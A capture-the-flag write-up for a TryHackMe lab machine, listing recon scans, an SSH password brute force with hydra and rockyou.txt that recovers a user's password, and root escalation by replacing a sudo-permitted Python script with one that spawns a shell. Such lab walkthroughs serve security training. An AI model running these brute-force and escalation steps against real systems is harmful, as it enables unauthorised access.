Library

Room Link: https://tryhackme.com/room/bsidesgtlibrary

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Nothing in the robots.txt except a hint to use rockyou

We can see a potential username

TCP/22 - SSH

Since I couldn't find anything on the webpage I tried bruteforcing ssh with the name we had and rockyou.txt for passwords

Kali

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt $VICTIM -t4 ssh

Kali

ssh meliodas@$VICTIM
Password: iloveyou1

Victim

sudo -l

We can run a python script with NOPASSWD. After looking at the script nothing stood out that could be exploited as is but I did have access to delete the script and put my own.

Victim

cd /home/meliodas/
ls -lah 
rm -f bak.py

Victim

echo  "import os" > bak.py
echo 'os.system("/bin/sh")' >> bak.py
sudo /usr/bin/python3 /home/meliodas/bak.py